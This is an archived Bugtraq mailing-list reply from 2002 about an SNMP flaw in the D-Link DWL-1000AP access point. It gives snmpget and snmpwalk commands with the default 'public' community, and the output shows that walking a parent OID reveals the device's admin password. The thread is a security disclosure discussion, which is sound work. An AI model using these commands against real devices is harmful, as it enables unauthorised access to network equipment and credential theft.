[23976] in bugtraq
Re: D-Link DWL-1000AP can be compromised because of SNMP configuration
daemon@ATHENA.MIT.EDU (David)
Thu Jan 24 16:26:37 2002
Message-ID: <004701c1a4ab$c32613e0$0400a8c0@laptop>
From: "David" <megor@home.com>
To: "Jim" <raxor@dexlink.com>, <bugtraq@securityfocus.com>
Date: Wed, 23 Jan 2002 23:50:14 -0800
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
The bug in the access point only reveals the password if you call for it by
doing a snmp walk which uses a next request to get the oid instead of
calling it explicitly. I tried:
#snmpget 192.168.0.10 public enterprises.937.2.1.2.2.0
enterprises.937.2.1.2.2.0 = ""
#snmpwalk 192.168.0.10 public enterprises.937.2.1.2.2.0
enterprises.937.2.1.2.2.0 = ""
Both explicit calls to the oid fail but if I use next to call that oid I get
#snmpwalk 192.168.0.10 public enterprises.937.2.1.2.2
enterprises.937.2.1.2.2.0 = "mypw"
Here is my access point info:
system.sysDescr.0 = D-Link - WLAN Access Point, Version: 3.2.28 #483 (Aug
23 2001).
----- Original Message -----
From: "Jim" <raxor@dexlink.com>
To: <bugtraq@securityfocus.com>
Sent: Wednesday, January 23, 2002 11:15 AM
Subject: Re: D-Link DWL-1000AP can be compromised because of SNMP
configuration
>
> In-Reply-To: <20011221192655.6657.qmail@mail.securityfocus.com>
>
> OID 1.3.6.1.4.1.937.2.1.2.2.0 doesn't seem to exist
> on my DWL-1000AP.
>
> Is this a typo ? Or has this value changed with a
> recent firmware update ?
